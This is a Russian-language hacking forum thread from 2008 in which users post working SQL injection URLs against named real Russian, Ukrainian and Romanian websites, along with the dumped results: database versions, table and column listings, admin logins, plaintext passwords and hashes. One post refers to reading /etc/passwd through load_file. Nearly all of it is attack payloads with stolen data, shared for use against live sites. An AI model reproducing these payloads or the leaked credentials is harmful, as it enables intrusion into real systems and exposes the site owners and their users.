Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.07.2008, 04:07
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от Zedi
http://inforos.ru/?id=11041 точно не знаю но мне кажется этот сайт сплошная инъекцияя
впринципе ты оказался прав..
скажу сразу пинг до сайта, по крайней мере у меня большой был, поэтому может грузиться долго
http://inforos.ru/?idt=9999+unioN+select+1,concat_ws(0x3a3a,version( ),user(),database()),3,4,5,6,7/*
version(): 5.0.45-log
user(): inforosnet@localhost
database(): inforosnet
так как версия 5 - смотрим таблицы
http://inforos.ru/?idt=9999+unioN+select+1,concat_ws(0x2e,table_sche ma,table_name),3,4,5,6,7+from+information_schema.t ables/*
беглым взглядом окинув таблицы и ничего интересного не найдя в их названиях - проверил пару из них
http://inforos.ru/?idt=9999+unioN+select+1,concat_ws(0x2e,user_email ),null,null,5,null,null+from+inforos_user_reklama/*
здесь несколько мыльников...
так и не найдя ничего интересного, а скорее всего не пытаясь ничего интересного найти, так как очень хотелось спать, я запостил тут коммент и лег спать=)
Последний раз редактировалось gisTy; 13.07.2008 в 04:10..
|
|
|
13.07.2008, 04:08
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Сообщение от Zedi
http://inforos.ru/?id=11041 точно не знаю но мне кажется этот сайт сплошная инъекцияя
в следующий раз хоть колонки подбирай )
http://inforos.ru/?id=-1+union+select+concat_ws(0x3a,login,pass)+from+inf oros_manager/*
shurik:shurik
|
|
|
|
13.07.2008, 07:42
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Сегодня у нас - .com.ua
Autosvit.com.ua - PR 4
http://www.autosvit.com.ua/techauto.php?id=9999999'+union+select+table_name+f rom+information_schema.tables+limit+67,1/*
Justinian.com.ua - PR 4
http://www.justinian.com.ua/article.php?id=9999999+UNION+SELECT+1,unhex(hex(ve rsion())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Expohome.com.ua - PR 4
http://www.expohome.com.ua/index.php?id=16&lang=ru&page=vital'+union+select+v ersion(),2,3,4,5/*
Aquariumist.com.ua - PR 4
http://www.aquariumist.com.ua/fish.php?id=999999+union+select+1,version(),3,4,5/*
Zoorinok.com.ua - PR 3
http://zoorinok.com.ua/details_topic.php?id=999999+union+select+1,table_n ame,3,4,5,6,7+from+information_schema.tables/*
Tribaldance.com.ua - PR 3
http://www.tribaldance.com.ua/index.php?id=9999+union+select+1,2,3,version()/*
а так же .te.ua
City.te.ua
http://city.te.ua/articles.php?gr_id=2&id=-1+union+select+1,2,concat_ws(0x3a,name,passwort,em ail),4+from+users--
Tehnosvitlo.te.ua
http://www.tehnosvitlo.te.ua/news.php?id=999999'+union+select+1,table_name+from +information_schema.tables+limit+23,1/*
Dovidka.te.ua
http://www.dovidka.te.ua/katalog/index.php?id=9999+union+select+1,version(),3,4,5,6 ,7,8,9,10,11/*
Idea-key.te.ua
http://idea-key.te.ua/index.php?p=4&id=9999999+union+select+1,table_name ,3,4,5,6,7+from+information_schema.tables+limit+27 ,1/*
Последний раз редактировалось sabe; 13.07.2008 в 11:05..
|
|
|
|
13.07.2008, 11:52
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
Народ
load_file(0x2F6574632F706173737764)
x2F6574632F706173737764
это какая кодировка? чем или где можно расшифровать?
|
|
|
|
13.07.2008, 12:12
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 904
Провел на форуме:
4037638
Репутация:
1821
|
|
Сообщение от 2la.painkiller
Народ
load_file(0x2F6574632F706173737764)
x2F6574632F706173737764
это какая кодировка? чем или где можно расшифровать?
http://forum.antichat.ru/thread46016.html - Тебе сюда, здесь постят SQLиньекции...
|
|
|
|
13.07.2008, 12:37
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.topsport.ro/Web/News.php?NewsID=533+union+select+1,aes_decrypt(aes _encrypt(concat_ws(0x3a,version(),database(),user( )),0x71),0x71),3,4,5,6+limit+1,1/*
Database Version: 4.1.4-gamma-max-log
Database name: topsport
User name: root@localhost
нашел только mysql.user но ничего интересного там нет
http://www.datacont.ro/index2.php?newsid=-93+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Ver sion(),0x3a,Database(),0x3a,User()),0x71),0x71),2, 3,4,5,6,7,8,9,10--
Database Version: 51a-community-log
Database name: datacont_one
User name: datacont_gigiftp@localhost
из information.schema_tables и information.schema_columns интересное только
abcn_users
http://www.datacont.ro/index2.php?newsid=-93+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT((SE LECT+CONCAT(name,login,password)+FROM+datacont_one .abcn_users+LIMIT+0,1)),0x71),0x71),2,3,4,5,6,7,8, 9,10--
Administrator:corada:25033b69ce6b84e5efaf67667bdff b52e1
http://www.dentland.ro/index.php?newsid=28+UNION+SELECT+1,AES_DECRYPT(AES _ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,Use r()),0x71),0x71),3,4,5,6,7,8,9+LIMIT+1,1--
Database Version: 4.1.22-standard-log
Database name: dentland_dent
User name: dentland_dentlan@localhost
http://www.dentland.ro/index.php?newsid=-28+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3a,name,password,username),0x71),0x71),3,4,5,6 ,7,8,9+FROM+jos_users+LIMIT+0,1--
Administrator:ada6360c5d3d4ca341930bd574c9f9aa:0En DhTTFqxPkZGCb:admin
http://www.arhitectura1906.ro/newsdetail.php?id_nws=26+UNION+SELECT+1,2,CONCAT_W S(0x3a,Version(),User(),Database()),4,5,6,7,8,9,10 ,11,12,13,14,15,16+LIMIT+1,1/*
Database Version: 4.1.22-standard
Database name: usr_web15_2
User name: web15@localhost
http://www.3minute.ro/stire.php?NewsID=12746+UNION+SELECT+1,AES_DECRYPT( AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Us er()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21+LIMIT+1,1&NewsCategoryID=13&Back URL=Lw==
Database Version: 5.0.51a-community-log
Database name: minute_db
User name: minute_user@localhost
как ни странно но ничего интересного не нашел в БД..может я не смотрел..но никакого подозрения на наличие пасов или юзеров я не нашел
http://www.btldesign.ro/detalii-noutate.php?newsID=46+UNION+SELECT+1,AES_DECRYPT(A ES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Use r()),0x71),0x71),3,4,5,6,7,8+LIMIT+1,1/*
Database Version: 4.1.22-standard
Database name: ionradu_btl
User name: ionradu_btl@localhost
http://www.btldesign.ro/detalii-noutate.php?newsID=-46+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3a,pass,user,userid),0x71),0x71),3,4,5,6,7,8+F ROM+user+LIMIT+0,1/*
btldesign2003:admin:1
xadmin:designit:2
http://www.btldesign.ro/admin
http://www.ecotic.ro/comunicate.php?NewsId=-20+UNION+SELECT+1,2,3,4,5,CONCAT_WS(0x3a,User(),Ve rsion(),Database()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22/*
Database Version: 4.1.20-log
Database name: ecotic
User name: ecotic@localhost
http://magureanusiasociatii.eu/news.php?go=fullnews&newsid=-2+union+select+1,2,3,4,CONCAT_WS(0x3a,user(),versi on(),database()),6,7/*
Database Version: 4.0.27-standard
Database name: magurean_gm
User name: magurean@localhost
всем спасибо.
Последний раз редактировалось Gorev; 13.07.2008 в 13:55..
|
|
|
|
13.07.2008, 13:03
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
_http://www.viperson.ru/wind.php?ID=-...t+0,1/*&soch=1
Версия():4
mysql.user
user:root
password:1q2w3e
host:%
_http://www.ganzara.ru/internet/book%20/media/?id=-1+union+select+1,2,user(),database(),5,6,version()/*
user():shop96ru@berns.mplik.ru
database():shop96ru
version():5.0.41-log
_http://www.ganzara.ru/internet/book%20/media/?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,name, pass,email)+from+auto_users+limit+0,1/*
_http://www.ganzara.ru/internet/book%20/media/?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,acces s,name,login,passwd,tel,email)+from+ha_users+limit +0,1/*
_http://www.di-do.ru/info.php?id=-1+union+select+version(),database(),3,4,USer(),6,7 ,8,9,10,11/*
user():fenshuj_seller@localhost
database():fenshuj_realshop
version():4.1.22-standard-log
_http://dom-zdorovja.ru/product.php?id=-1+union+select+1,2,user(),database(),5,version(),7 ,8,9,10,11,12,13,14,15,16,17,18,19,20/*
user():domzdor7_alexey@localhost
database():domzdor7_shop
version():4.1.22-log
Ps:Дохлая какай-то тема((
_http://www.inst.ru/catalog.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6/*
user():instruct@v2.valuehost.ru
database():instruct
version():4.0.27-max-log
_http://www.novostroy.ru/directrix/details.php?item_id=-1+union+select+1,database(),3,user(),version(),6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26/*&id=1
user():wwditrix@localhost
database():directrix
version():4.0.27-1-log
|
|
|
|
13.07.2008, 14:51
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
магазин техники zvi.ru
http://www.zvi.ru/cat.php?cat=3
Database Version: 5.0.26
Database name: shop2
User name: szvi@localhost
Код:
http://www.zvi.ru/cat.php?cat=3%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
поля для вывода 2,7
Последний раз редактировалось MaSTeR GэN; 13.07.2008 в 14:56..
|
|
|
|
13.07.2008, 16:06
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
Код:
http://www.mxmaster.kharkov.ua/index.php?mode=view_full&mx_news_id=101+UNION+SELECT+1,2,concat(mx_username,0x3a,mx_password),4,5,6,7+FROM+mxmaster_mxmasterdb.mx_admin+LIMIT+1,2/*
root:123123
неподходит 
http://www.mxmaster.kharkov.ua/admin
Последний раз редактировалось DJ ][akep; 13.07.2008 в 16:09..
|
|
|
|
13.07.2008, 20:08
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
ООО "Жилищный капитал", г. Волгоград
Код:
http://www.jk-nbik.ru/?alias=show&id=260'
Код:
http://www.jk-nbik.ru/?alias=show&id=260+AND+1%3Cascii(substring((SELECT+table_name+FROM+information_schema.tables+limit+1,1),1,1))
Код:
http://www.jk-nbik.ru/?alias=show&id=256++AND+1%3Cascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name+like+char(105,109,103,101,115)+limit+1,1),1,1))
VERSION(): 5.0.51a-community-log
USER: lipnbikr_sergio@localhost
DATABASE(): lipnbikr_jk
Список таблиц и колонок:
Код:
************************************
LLN_catalog
-----------------------------------
id
name
abc
sort
************************************
LLN_check
-----------------------------------
check_id
ch_date
etap
id
proverok
send
status
************************************
LLN_info
-----------------------------------
id
info
************************************
LLN_letters
************************************
LLN_links
-----------------------------------
add_date
backlink
banner
cat
cy
host
id
link
mail
status
************************************
LLN_modules
-----------------------------------
name
sort
************************************
LLN_mylinks
-----------------------------------
id
link
type
***********************************
LLN_values
-----------------------------------
name
value
value_date
value_int
************************************
imges
------------------------------------
Id
************************************
novostroy
------------------------------------
area
building_descr
city
course_usd
direction
highway
how_far
how_far1
how_fast
id
location
location1
obj_rur
obj_usd
obn_descr
obn_link
obn_photo
obn_time
obn_type
org_logo
org_name
orient
phone
price_rur
price_usd
************************************
ut_cities
------------------------------------
c_direction
c_distance
c_id
c_name
c_sort
************************************
ut_img
------------------------------------
active
Descr
Id
ParentID
type
************************************
ut_news
------------------------------------
Data
Descr1
Descr2
Header
Id
img
imgs
isPublic
Press
status
************************************
ut_section
------------------------------------
Alias
isInMap
isInMenu
isPublic
isSearch
Links
MOrderIndex
MParentID
OrderIndex
ParentID
SectionID
************************************
ut_sectiondata
------------------------------------
Content
Descr
Header
Keywords
LangID
mtime
SectionID
Title
************************************
ut_zm
------------------------------------
c_direction
c_distance
c_id
c_name
c_sort
************************************
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.gif){kind=avatar}
Похожие темы
Линейный вид
